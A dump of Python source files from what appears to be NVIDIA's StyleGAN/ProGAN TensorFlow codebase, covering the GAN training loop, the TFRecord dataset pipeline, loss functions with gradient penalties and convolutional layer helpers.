% network_pkl) G, D, Gs = misc.load_pkl(network_pkl) else: print('Constructing networks...') G = tflib.Network('G', num_channels=training_set.shape[0], resolution=training_set.shape[1], label_size=training_set.label_size, **G_args) D = tflib.Network('D', num_channels=training_set.shape[0], resolution=training_set.shape[1], label_size=training_set.label_size, **D_args) Gs = G.clone('Gs') G.print_layers(); D.print_layers() print('Building TensorFlow graph...') with tf.name_scope('Inputs'), tf.device('/cpu:0'): lod_in = tf.placeholder(tf.float32, name='lod_in', shape=[]) lrate_in = tf.placeholder(tf.float32, name='lrate_in', shape=[]) minibatch_in = tf.placeholder(tf.int32, name='minibatch_in', shape=[]) minibatch_split = minibatch_in // submit_config.num_gpus Gs_beta = 0.5 ** tf.div(tf.cast(minibatch_in, tf.float32), G_smoothing_kimg * 1000.0) if G_smoothing_kimg > 0.0 else 0.0 G_opt = tflib.Optimizer(name='TrainG', learning_rate=lrate_in, **G_opt_args) D_opt = tflib.Optimizer(name='TrainD', learning_rate=lrate_in, **D_opt_args) for gpu in range(submit_config.num_gpus): with tf.name_scope('GPU%d' % gpu), tf.device('/gpu:%d' % gpu): G_gpu = G if gpu == 0 else G.clone(G.name + '_shadow') D_gpu = D if gpu == 0 else D.clone(D.name + '_shadow') lod_assign_ops = [tf.assign(G_gpu.find_var('lod'), lod_in), tf.assign(D_gpu.find_var('lod'), lod_in)] reals, labels = training_set.get_minibatch_tf() reals = process_reals(reals, lod_in, mirror_augment, training_set.dynamic_range, drange_net) with tf.name_scope('G_loss'), tf.control_dependencies(lod_assign_ops): G_loss = dnnlib.util.call_func_by_name(G=G_gpu, D=D_gpu, opt=G_opt, training_set=training_set, minibatch_size=minibatch_split, **G_loss_args) with tf.name_scope('D_loss'), tf.control_dependencies(lod_assign_ops): D_loss = dnnlib.util.call_func_by_name(G=G_gpu, D=D_gpu, opt=D_opt, training_set=training_set, minibatch_size=minibatch_split, reals=reals, labels=labels, **D_loss_args) G_opt.register_gradients(tf.reduce_mean(G_loss), G_gpu.trainables) D_opt.register_gradients(tf.reduce_mean(D_loss), D_gpu.trainables) G_train_op = G_opt.apply_updates() D_train_op = D_opt.apply_updates() Gs_update_op = Gs.setup_as_moving_average_of(G, beta=Gs_beta) with tf.device('/gpu:0'): try: peak_gpu_mem_op = tf.contrib.memory_stats.MaxBytesInUse() except tf.errors.NotFoundError: peak_gpu_mem_op = tf.constant(0) print('Setting up snapshot image grid...') grid_size, grid_reals, grid_labels, grid_latents = misc.setup_snapshot_image_grid(G, training_set, **grid_args) sched = training_schedule(cur_nimg=total_kimg*1000, training_set=training_set, num_gpus=submit_config.num_gpus, **sched_args) grid_fakes = Gs.run(grid_latents, grid_labels, is_validation=True, minibatch_size=sched.minibatch//submit_config.num_gpus) print('Setting up run dir...') misc.save_image_grid(grid_reals, os.path.join(submit_config.run_dir, 'reals.png'), drange=training_set.dynamic_range, grid_size=grid_size) misc.save_image_grid(grid_fakes, os.path.join(submit_config.run_dir, 'fakes%06d.png' % resume_kimg), drange=drange_net, grid_size=grid_size) summary_log = tf.summary.FileWriter(submit_config.run_dir) if save_tf_graph: summary_log.add_graph(tf.get_default_graph()) if save_weight_histograms: G.setup_weight_histograms(); D.setup_weight_histograms() metrics = metric_base.MetricGroup(metric_arg_list) print('Training...\n') ctx.update('', cur_epoch=resume_kimg, max_epoch=total_kimg) maintenance_time = ctx.get_last_update_interval() cur_nimg = int(resume_kimg * 1000) cur_tick = 0 tick_start_nimg = 
cur_nimg prev_lod = -1.0 while cur_nimg < total_kimg * 1000: if ctx.should_stop(): break # Choose training parameters and configure training ops. sched = training_schedule(cur_nimg=cur_nimg, training_set=training_set, num_gpus=submit_config.num_gpus, **sched_args) training_set.configure(sched.minibatch // submit_config.num_gpus, sched.lod) if reset_opt_for_new_lod: if np.floor(sched.lod) != np.floor(prev_lod) or np.ceil(sched.lod) != np.ceil(prev_lod): G_opt.reset_optimizer_state(); D_opt.reset_optimizer_state() prev_lod = sched.lod # Run training ops. for _mb_repeat in range(minibatch_repeats): for _D_repeat in range(D_repeats): tflib.run([D_train_op, Gs_update_op], {lod_in: sched.lod, lrate_in: sched.D_lrate, minibatch_in: sched.minibatch}) cur_nimg += sched.minibatch tflib.run([G_train_op], {lod_in: sched.lod, lrate_in: sched.G_lrate, minibatch_in: sched.minibatch}) # Perform maintenance tasks once per tick. done = (cur_nimg >= total_kimg * 1000) if cur_nimg >= tick_start_nimg + sched.tick_kimg * 1000 or done: cur_tick += 1 tick_kimg = (cur_nimg - tick_start_nimg) / 1000.0 tick_start_nimg = cur_nimg tick_time = ctx.get_time_since_last_update() total_time = ctx.get_time_since_start() + resume_time # Report progress. print('tick %-5d kimg %-8.1f lod %-5.2f minibatch %-4d time %-12s sec/tick %-7.1f sec/kimg %-7.2f maintenance %-6.1f gpumem %-4.1f' % ( autosummary('Progress/tick', cur_tick), autosummary('Progress/kimg', cur_nimg / 1000.0), autosummary('Progress/lod', sched.lod), autosummary('Progress/minibatch', sched.minibatch), dnnlib.util.format_time(autosummary('Timing/total_sec', total_time)), autosummary('Timing/sec_per_tick', tick_time), autosummary('Timing/sec_per_kimg', tick_time / tick_kimg), autosummary('Timing/maintenance_sec', maintenance_time), autosummary('Resources/peak_gpu_mem_gb', peak_gpu_mem_op.eval() / 2**30))) autosummary('Timing/total_hours', total_time / (60.0 * 60.0)) autosummary('Timing/total_days', total_time / (24.0 * 60.0 * 60.0)) # Save snapshots. if cur_tick % image_snapshot_ticks == 0 or done: grid_fakes = Gs.run(grid_latents, grid_labels, is_validation=True, minibatch_size=sched.minibatch//submit_config.num_gpus) misc.save_image_grid(grid_fakes, os.path.join(submit_config.run_dir, 'fakes%06d.png' % (cur_nimg // 1000)), drange=drange_net, grid_size=grid_size) if cur_tick % network_snapshot_ticks == 0 or done or cur_tick == 1: pkl = os.path.join(submit_config.run_dir, 'network-snapshot-%06d.pkl' % (cur_nimg // 1000)) misc.save_pkl((G, D, Gs), pkl) metrics.run(pkl, run_dir=submit_config.run_dir, num_gpus=submit_config.num_gpus, tf_config=tf_config) # Update summaries and RunContext. metrics.update_autosummaries() tflib.autosummary.save_summaries(summary_log, cur_nimg) ctx.update('%.2f' % sched.lod, cur_epoch=cur_nimg // 1000, max_epoch=total_kimg) maintenance_time = ctx.get_last_update_interval() - tick_time # Write final results. misc.save_pkl((G, D, Gs), os.path.join(submit_config.run_dir, 'network-final.pkl')) summary_log.close() ctx.close() #---------------------------------------------------------------------------- File: training/dataset.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. 
"""Multi-resolution input data pipeline.""" import os import glob import numpy as np import tensorflow as tf import dnnlib import dnnlib.tflib as tflib #---------------------------------------------------------------------------- # Parse individual image from a tfrecords file. def parse_tfrecord_tf(record): features = tf.parse_single_example(record, features={ 'shape': tf.FixedLenFeature([3], tf.int64), 'data': tf.FixedLenFeature([], tf.string)}) data = tf.decode_raw(features['data'], tf.uint8) return tf.reshape(data, features['shape']) def parse_tfrecord_np(record): ex = tf.train.Example() ex.ParseFromString(record) shape = ex.features.feature['shape'].int64_list.value # temporary pylint workaround # pylint: disable=no-member data = ex.features.feature['data'].bytes_list.value[0] # temporary pylint workaround # pylint: disable=no-member return np.fromstring(data, np.uint8).reshape(shape) #---------------------------------------------------------------------------- # Dataset class that loads data from tfrecords files. class TFRecordDataset: def __init__(self, tfrecord_dir, # Directory containing a collection of tfrecords files. resolution = None, # Dataset resolution, None = autodetect. label_file = None, # Relative path of the labels file, None = autodetect. max_label_size = 0, # 0 = no labels, 'full' = full labels, <int> = N first label components. repeat = True, # Repeat dataset indefinitely. shuffle_mb = 4096, # Shuffle data within specified window (megabytes), 0 = disable shuffling. prefetch_mb = 2048, # Amount of data to prefetch (megabytes), 0 = disable prefetching. buffer_mb = 256, # Read buffer size (megabytes). num_threads = 2): # Number of concurrent threads. self.tfrecord_dir = tfrecord_dir self.resolution = None self.resolution_log2 = None self.shape = [] # [channel, height, width] self.dtype = 'uint8' self.dynamic_range = [0, 255] self.label_file = label_file self.label_size = None # [component] self.label_dtype = None self._np_labels = None self._tf_minibatch_in = None self._tf_labels_var = None self._tf_labels_dataset = None self._tf_datasets = dict() self._tf_iterator = None self._tf_init_ops = dict() self._tf_minibatch_np = None self._cur_minibatch = -1 self._cur_lod = -1 # List tfrecords files and inspect their shapes. assert os.path.isdir(self.tfrecord_dir) tfr_files = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.tfrecords'))) assert len(tfr_files) >= 1 tfr_shapes = [] for tfr_file in tfr_files: tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE) for record in tf.python_io.tf_record_iterator(tfr_file, tfr_opt): tfr_shapes.append(parse_tfrecord_np(record).shape) break # Autodetect label filename. if self.label_file is None: guess = sorted(glob.glob(os.path.join(self.tfrecord_dir, '*.labels'))) if len(guess): self.label_file = guess[0] elif not os.path.isfile(self.label_file): guess = os.path.join(self.tfrecord_dir, self.label_file) if os.path.isfile(guess): self.label_file = guess # Determine shape and resolution. 
max_shape = max(tfr_shapes, key=np.prod) self.resolution = resolution if resolution is not None else max_shape[1] self.resolution_log2 = int(np.log2(self.resolution)) self.shape = [max_shape[0], self.resolution, self.resolution] tfr_lods = [self.resolution_log2 - int(np.log2(shape[1])) for shape in tfr_shapes] assert all(shape[0] == max_shape[0] for shape in tfr_shapes) assert all(shape[1] == shape[2] for shape in tfr_shapes) assert all(shape[1] == self.resolution // (2**lod) for shape, lod in zip(tfr_shapes, tfr_lods)) assert all(lod in tfr_lods for lod in range(self.resolution_log2 - 1)) # Load labels. assert max_label_size == 'full' or max_label_size >= 0 self._np_labels = np.zeros([1<<20, 0], dtype=np.float32) if self.label_file is not None and max_label_size != 0: self._np_labels = np.load(self.label_file) assert self._np_labels.ndim == 2 if max_label_size != 'full' and self._np_labels.shape[1] > max_label_size: self._np_labels = self._np_labels[:, :max_label_size] self.label_size = self._np_labels.shape[1] self.label_dtype = self._np_labels.dtype.name # Build TF expressions. with tf.name_scope('Dataset'), tf.device('/cpu:0'): self._tf_minibatch_in = tf.placeholder(tf.int64, name='minibatch_in', shape=[]) self._tf_labels_var = tflib.create_var_with_large_initial_value(self._np_labels, name='labels_var') self._tf_labels_dataset = tf.data.Dataset.from_tensor_slices(self._tf_labels_var) for tfr_file, tfr_shape, tfr_lod in zip(tfr_files, tfr_shapes, tfr_lods): if tfr_lod < 0: continue dset = tf.data.TFRecordDataset(tfr_file, compression_type='', buffer_size=buffer_mb<<20) dset = dset.map(parse_tfrecord_tf, num_parallel_calls=num_threads) dset = tf.data.Dataset.zip((dset, self._tf_labels_dataset)) bytes_per_item = np.prod(tfr_shape) * np.dtype(self.dtype).itemsize if shuffle_mb > 0: dset = dset.shuffle(((shuffle_mb << 20) - 1) // bytes_per_item + 1) if repeat: dset = dset.repeat() if prefetch_mb > 0: dset = dset.prefetch(((prefetch_mb << 20) - 1) // bytes_per_item + 1) dset = dset.batch(self._tf_minibatch_in) self._tf_datasets[tfr_lod] = dset self._tf_iterator = tf.data.Iterator.from_structure(self._tf_datasets[0].output_types, self._tf_datasets[0].output_shapes) self._tf_init_ops = {lod: self._tf_iterator.make_initializer(dset) for lod, dset in self._tf_datasets.items()} # Use the given minibatch size and level-of-detail for the data returned by get_minibatch_tf(). def configure(self, minibatch_size, lod=0): lod = int(np.floor(lod)) assert minibatch_size >= 1 and lod in self._tf_datasets if self._cur_minibatch != minibatch_size or self._cur_lod != lod: self._tf_init_ops[lod].run({self._tf_minibatch_in: minibatch_size}) self._cur_minibatch = minibatch_size self._cur_lod = lod # Get next minibatch as TensorFlow expressions. def get_minibatch_tf(self): # => images, labels return self._tf_iterator.get_next() # Get next minibatch as NumPy arrays. def get_minibatch_np(self, minibatch_size, lod=0): # => images, labels self.configure(minibatch_size, lod) if self._tf_minibatch_np is None: self._tf_minibatch_np = self.get_minibatch_tf() return tflib.run(self._tf_minibatch_np) # Get random labels as TensorFlow expression. def get_random_labels_tf(self, minibatch_size): # => labels if self.label_size > 0: with tf.device('/cpu:0'): return tf.gather(self._tf_labels_var, tf.random_uniform([minibatch_size], 0, self._np_labels.shape[0], dtype=tf.int32)) return tf.zeros([minibatch_size, 0], self.label_dtype) # Get random labels as NumPy array. 
def get_random_labels_np(self, minibatch_size): # => labels if self.label_size > 0: return self._np_labels[np.random.randint(self._np_labels.shape[0], size=[minibatch_size])] return np.zeros([minibatch_size, 0], self.label_dtype) #---------------------------------------------------------------------------- # Base class for datasets that are generated on the fly. class SyntheticDataset: def __init__(self, resolution=1024, num_channels=3, dtype='uint8', dynamic_range=[0,255], label_size=0, label_dtype='float32'): self.resolution = resolution self.resolution_log2 = int(np.log2(resolution)) self.shape = [num_channels, resolution, resolution] self.dtype = dtype self.dynamic_range = dynamic_range self.label_size = label_size self.label_dtype = label_dtype self._tf_minibatch_var = None self._tf_lod_var = None self._tf_minibatch_np = None self._tf_labels_np = None assert self.resolution == 2 ** self.resolution_log2 with tf.name_scope('Dataset'): self._tf_minibatch_var = tf.Variable(np.int32(0), name='minibatch_var') self._tf_lod_var = tf.Variable(np.int32(0), name='lod_var') def configure(self, minibatch_size, lod=0): lod = int(np.floor(lod)) assert minibatch_size >= 1 and 0 <= lod <= self.resolution_log2 tflib.set_vars({self._tf_minibatch_var: minibatch_size, self._tf_lod_var: lod}) def get_minibatch_tf(self): # => images, labels with tf.name_scope('SyntheticDataset'): shrink = tf.cast(2.0 ** tf.cast(self._tf_lod_var, tf.float32), tf.int32) shape = [self.shape[0], self.shape[1] // shrink, self.shape[2] // shrink] images = self._generate_images(self._tf_minibatch_var, self._tf_lod_var, shape) labels = self._generate_labels(self._tf_minibatch_var) return images, labels def get_minibatch_np(self, minibatch_size, lod=0): # => images, labels self.configure(minibatch_size, lod) if self._tf_minibatch_np is None: self._tf_minibatch_np = self.get_minibatch_tf() return tflib.run(self._tf_minibatch_np) def get_random_labels_tf(self, minibatch_size): # => labels with tf.name_scope('SyntheticDataset'): return self._generate_labels(minibatch_size) def get_random_labels_np(self, minibatch_size): # => labels self.configure(minibatch_size) if self._tf_labels_np is None: self._tf_labels_np = self.get_random_labels_tf(minibatch_size) return tflib.run(self._tf_labels_np) def _generate_images(self, minibatch, lod, shape): # to be overridden by subclasses # pylint: disable=unused-argument return tf.zeros([minibatch] + shape, self.dtype) def _generate_labels(self, minibatch): # to be overridden by subclasses return tf.zeros([minibatch, self.label_size], self.label_dtype) #---------------------------------------------------------------------------- # Helper func for constructing a dataset object using the given options. def load_dataset(class_name='training.dataset.TFRecordDataset', data_dir=None, verbose=False, **kwargs): adjusted_kwargs = dict(kwargs) if 'tfrecord_dir' in adjusted_kwargs and data_dir is not None: adjusted_kwargs['tfrecord_dir'] = os.path.join(data_dir, adjusted_kwargs['tfrecord_dir']) if verbose: print('Streaming data using %s...' % class_name) dataset = dnnlib.util.get_obj_by_name(class_name)(**adjusted_kwargs) if verbose: print('Dataset shape =', np.int32(dataset.shape).tolist()) print('Dynamic range =', dataset.dynamic_range) print('Label size =', dataset.label_size) return dataset #---------------------------------------------------------------------------- File: training/loss.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. 
# # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Loss functions.""" import tensorflow as tf import dnnlib.tflib as tflib from dnnlib.tflib.autosummary import autosummary #---------------------------------------------------------------------------- # Convenience func that casts all of its arguments to tf.float32. def fp32(*values): if len(values) == 1 and isinstance(values[0], tuple): values = values[0] values = tuple(tf.cast(v, tf.float32) for v in values) return values if len(values) >= 2 else values[0] #---------------------------------------------------------------------------- # WGAN & WGAN-GP loss functions. def G_wgan(G, D, opt, training_set, minibatch_size): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) labels = training_set.get_random_labels_tf(minibatch_size) fake_images_out = G.get_output_for(latents, labels, is_training=True) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) loss = -fake_scores_out return loss def D_wgan(G, D, opt, training_set, minibatch_size, reals, labels, # pylint: disable=unused-argument wgan_epsilon = 0.001): # Weight for the epsilon term, \epsilon_{drift}. latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = fake_scores_out - real_scores_out with tf.name_scope('EpsilonPenalty'): epsilon_penalty = autosummary('Loss/epsilon_penalty', tf.square(real_scores_out)) loss += epsilon_penalty * wgan_epsilon return loss def D_wgan_gp(G, D, opt, training_set, minibatch_size, reals, labels, # pylint: disable=unused-argument wgan_lambda = 10.0, # Weight for the gradient penalty term. wgan_epsilon = 0.001, # Weight for the epsilon term, \epsilon_{drift}. wgan_target = 1.0): # Target value for gradient magnitudes. 
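    # Note: WGAN-GP penalizes the critic's gradient norm on random interpolates between
    # real and fake images, pulling it towards wgan_target; the epsilon term on
    # tf.square(real_scores_out) keeps the real scores from drifting away from zero.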
latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = fake_scores_out - real_scores_out with tf.name_scope('GradientPenalty'): mixing_factors = tf.random_uniform([minibatch_size, 1, 1, 1], 0.0, 1.0, dtype=fake_images_out.dtype) mixed_images_out = tflib.lerp(tf.cast(reals, fake_images_out.dtype), fake_images_out, mixing_factors) mixed_scores_out = fp32(D.get_output_for(mixed_images_out, labels, is_training=True)) mixed_scores_out = autosummary('Loss/scores/mixed', mixed_scores_out) mixed_loss = opt.apply_loss_scaling(tf.reduce_sum(mixed_scores_out)) mixed_grads = opt.undo_loss_scaling(fp32(tf.gradients(mixed_loss, [mixed_images_out])[0])) mixed_norms = tf.sqrt(tf.reduce_sum(tf.square(mixed_grads), axis=[1,2,3])) mixed_norms = autosummary('Loss/mixed_norms', mixed_norms) gradient_penalty = tf.square(mixed_norms - wgan_target) loss += gradient_penalty * (wgan_lambda / (wgan_target**2)) with tf.name_scope('EpsilonPenalty'): epsilon_penalty = autosummary('Loss/epsilon_penalty', tf.square(real_scores_out)) loss += epsilon_penalty * wgan_epsilon return loss #---------------------------------------------------------------------------- # Hinge loss functions. (Use G_wgan with these) def D_hinge(G, D, opt, training_set, minibatch_size, reals, labels): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.maximum(0., 1.+fake_scores_out) + tf.maximum(0., 1.-real_scores_out) return loss def D_hinge_gp(G, D, opt, training_set, minibatch_size, reals, labels, # pylint: disable=unused-argument wgan_lambda = 10.0, # Weight for the gradient penalty term. wgan_target = 1.0): # Target value for gradient magnitudes. 
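    # Note: same interpolate-based gradient penalty as D_wgan_gp above, applied on top of
    # the hinge loss max(0, 1 + D(fake)) + max(0, 1 - D(real)).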
latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.maximum(0., 1.+fake_scores_out) + tf.maximum(0., 1.-real_scores_out) with tf.name_scope('GradientPenalty'): mixing_factors = tf.random_uniform([minibatch_size, 1, 1, 1], 0.0, 1.0, dtype=fake_images_out.dtype) mixed_images_out = tflib.lerp(tf.cast(reals, fake_images_out.dtype), fake_images_out, mixing_factors) mixed_scores_out = fp32(D.get_output_for(mixed_images_out, labels, is_training=True)) mixed_scores_out = autosummary('Loss/scores/mixed', mixed_scores_out) mixed_loss = opt.apply_loss_scaling(tf.reduce_sum(mixed_scores_out)) mixed_grads = opt.undo_loss_scaling(fp32(tf.gradients(mixed_loss, [mixed_images_out])[0])) mixed_norms = tf.sqrt(tf.reduce_sum(tf.square(mixed_grads), axis=[1,2,3])) mixed_norms = autosummary('Loss/mixed_norms', mixed_norms) gradient_penalty = tf.square(mixed_norms - wgan_target) loss += gradient_penalty * (wgan_lambda / (wgan_target**2)) return loss #---------------------------------------------------------------------------- # Loss functions advocated by the paper # "Which Training Methods for GANs do actually Converge?" def G_logistic_saturating(G, D, opt, training_set, minibatch_size): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) labels = training_set.get_random_labels_tf(minibatch_size) fake_images_out = G.get_output_for(latents, labels, is_training=True) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) loss = -tf.nn.softplus(fake_scores_out) # log(1 - logistic(fake_scores_out)) return loss def G_logistic_nonsaturating(G, D, opt, training_set, minibatch_size): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) labels = training_set.get_random_labels_tf(minibatch_size) fake_images_out = G.get_output_for(latents, labels, is_training=True) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) loss = tf.nn.softplus(-fake_scores_out) # -log(logistic(fake_scores_out)) return loss def D_logistic(G, D, opt, training_set, minibatch_size, reals, labels): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.nn.softplus(fake_scores_out) # -log(1 - logistic(fake_scores_out)) loss += tf.nn.softplus(-real_scores_out) # -log(logistic(real_scores_out)) # temporary pylint workaround # pylint: disable=invalid-unary-operand-type return loss def D_logistic_simplegp(G, D, opt, training_set, minibatch_size, reals, labels, r1_gamma=10.0, r2_gamma=0.0): # pylint: disable=unused-argument latents = tf.random_normal([minibatch_size] + G.input_shapes[0][1:]) fake_images_out = G.get_output_for(latents, labels, is_training=True) real_scores_out = 
fp32(D.get_output_for(reals, labels, is_training=True)) fake_scores_out = fp32(D.get_output_for(fake_images_out, labels, is_training=True)) real_scores_out = autosummary('Loss/scores/real', real_scores_out) fake_scores_out = autosummary('Loss/scores/fake', fake_scores_out) loss = tf.nn.softplus(fake_scores_out) # -log(1 - logistic(fake_scores_out)) loss += tf.nn.softplus(-real_scores_out) # -log(logistic(real_scores_out)) # temporary pylint workaround # pylint: disable=invalid-unary-operand-type if r1_gamma != 0.0: with tf.name_scope('R1Penalty'): real_loss = opt.apply_loss_scaling(tf.reduce_sum(real_scores_out)) real_grads = opt.undo_loss_scaling(fp32(tf.gradients(real_loss, [reals])[0])) r1_penalty = tf.reduce_sum(tf.square(real_grads), axis=[1,2,3]) r1_penalty = autosummary('Loss/r1_penalty', r1_penalty) loss += r1_penalty * (r1_gamma * 0.5) if r2_gamma != 0.0: with tf.name_scope('R2Penalty'): fake_loss = opt.apply_loss_scaling(tf.reduce_sum(fake_scores_out)) fake_grads = opt.undo_loss_scaling(fp32(tf.gradients(fake_loss, [fake_images_out])[0])) r2_penalty = tf.reduce_sum(tf.square(fake_grads), axis=[1,2,3]) r2_penalty = autosummary('Loss/r2_penalty', r2_penalty) loss += r2_penalty * (r2_gamma * 0.5) return loss #---------------------------------------------------------------------------- File: training/networks_progan.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Network architectures used in the ProGAN paper.""" import numpy as np import tensorflow as tf # NOTE: Do not import any application-specific modules here! # Specify all network parameters as kwargs. #---------------------------------------------------------------------------- def lerp(a, b, t): return a + (b - a) * t def lerp_clip(a, b, t): return a + (b - a) * tf.clip_by_value(t, 0.0, 1.0) def cset(cur_lambda, new_cond, new_lambda): return lambda: tf.cond(new_cond, new_lambda, cur_lambda) #---------------------------------------------------------------------------- # Get/create weight tensor for a convolutional or fully-connected layer. def get_weight(shape, gain=np.sqrt(2), use_wscale=False): fan_in = np.prod(shape[:-1]) # [kernel, kernel, fmaps_in, fmaps_out] or [in, out] std = gain / np.sqrt(fan_in) # He init if use_wscale: wscale = tf.constant(np.float32(std), name='wscale') w = tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal()) * wscale else: w = tf.get_variable('weight', shape=shape, initializer=tf.initializers.random_normal(0, std)) return w #---------------------------------------------------------------------------- # Fully-connected layer. def dense(x, fmaps, gain=np.sqrt(2), use_wscale=False): if len(x.shape) > 2: x = tf.reshape(x, [-1, np.prod([d.value for d in x.shape[1:]])]) w = get_weight([x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.cast(w, x.dtype) return tf.matmul(x, w) #---------------------------------------------------------------------------- # Convolutional layer. 
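# Note: with use_wscale=True, get_weight() above stores unit-variance weights and scales
# them at run time by the He-init constant gain / sqrt(fan_in) (equalized learning rate).
# For example, a 3x3 convolution with 512 input feature maps and gain sqrt(2) uses
# wscale = sqrt(2) / sqrt(3*3*512), roughly 0.021; dense() above and conv2d() below share
# this scheme.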
def conv2d(x, fmaps, kernel, gain=np.sqrt(2), use_wscale=False): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,1,1], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Apply bias to the given activation tensor. def apply_bias(x): b = tf.get_variable('bias', shape=[x.shape[1]], initializer=tf.initializers.zeros()) b = tf.cast(b, x.dtype) if len(x.shape) == 2: return x + b return x + tf.reshape(b, [1, -1, 1, 1]) #---------------------------------------------------------------------------- # Leaky ReLU activation. Same as tf.nn.leaky_relu, but supports FP16. def leaky_relu(x, alpha=0.2): with tf.name_scope('LeakyRelu'): alpha = tf.constant(alpha, dtype=x.dtype, name='alpha') return tf.maximum(x * alpha, x) #---------------------------------------------------------------------------- # Nearest-neighbor upscaling layer. def upscale2d(x, factor=2): assert isinstance(factor, int) and factor >= 1 if factor == 1: return x with tf.variable_scope('Upscale2D'): s = x.shape x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1]) x = tf.tile(x, [1, 1, 1, factor, 1, factor]) x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor]) return x #---------------------------------------------------------------------------- # Fused upscale2d + conv2d. # Faster and uses less memory than performing the operations separately. def upscale2d_conv2d(x, fmaps, kernel, gain=np.sqrt(2), use_wscale=False): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.transpose(w, [0, 1, 3, 2]) # [kernel, kernel, fmaps_out, fmaps_in] w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) w = tf.cast(w, x.dtype) os = [tf.shape(x)[0], fmaps, x.shape[2] * 2, x.shape[3] * 2] return tf.nn.conv2d_transpose(x, w, os, strides=[1,1,2,2], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Box filter downscaling layer. def downscale2d(x, factor=2): assert isinstance(factor, int) and factor >= 1 if factor == 1: return x with tf.variable_scope('Downscale2D'): ksize = [1, 1, factor, factor] return tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding='VALID', data_format='NCHW') # NOTE: requires tf_config['graph_options.place_pruned_graph'] = True #---------------------------------------------------------------------------- # Fused conv2d + downscale2d. # Faster and uses less memory than performing the operations separately. def conv2d_downscale2d(x, fmaps, kernel, gain=np.sqrt(2), use_wscale=False): assert kernel >= 1 and kernel % 2 == 1 w = get_weight([kernel, kernel, x.shape[1].value, fmaps], gain=gain, use_wscale=use_wscale) w = tf.pad(w, [[1,1], [1,1], [0,0], [0,0]], mode='CONSTANT') w = tf.add_n([w[1:, 1:], w[:-1, 1:], w[1:, :-1], w[:-1, :-1]]) * 0.25 w = tf.cast(w, x.dtype) return tf.nn.conv2d(x, w, strides=[1,1,2,2], padding='SAME', data_format='NCHW') #---------------------------------------------------------------------------- # Pixelwise feature vector normalization. 
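# Illustrative sketch (never called by the networks; the helper name is made up for
# illustration): what upscale2d() and downscale2d() above compute, in plain NumPy, namely
# nearest-neighbor upsampling and box-filter (average-pooling) downsampling of NCHW arrays.

def _resample_demo_np(x, factor=2):
    """Return (upscaled, downscaled) copies of NCHW array `x` using the schemes above."""
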